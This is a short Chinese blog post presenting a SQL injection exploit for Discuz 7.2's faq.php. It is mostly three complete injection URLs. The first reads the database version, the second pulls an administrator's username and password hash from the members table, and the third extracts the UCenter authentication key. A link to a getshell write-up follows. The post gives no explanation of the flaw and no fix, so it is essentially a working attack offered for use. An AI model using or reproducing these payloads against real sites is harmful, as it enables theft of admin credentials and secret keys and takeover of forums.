Discuz 7.2 /faq.php SQL注入漏洞 – 网站安全 – 自学ph

时间: 2020-10-10|tag: 48次围观|0 条评论

1.获取 数据库版本信息

http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

Discuz 7.2 /faq.php SQL注入漏洞 – 网站安全 – 自学ph插图
2.获取管理员账户密码

http://www.xxoo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

Discuz 7.2 /faq.php SQL注入漏洞 – 网站安全 – 自学ph插图1
3.获取key

http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20substr(authkey,1,62)%20from%20cdb_uc_applications%20limit%200,1),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23

getshell参见 http://www.2cto.com/Article/201401/272274.html
    上一篇: Spring MVC xml绑定pojo造成的XXE - 网站安全 - 自学p

    下一篇: Discuz7.2 faq.php sqli分析(吐槽) - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《Discuz 7.2 /faq.php SQL注入漏洞 – 网站安全 – 自学ph
   

还没有人抢沙发呢~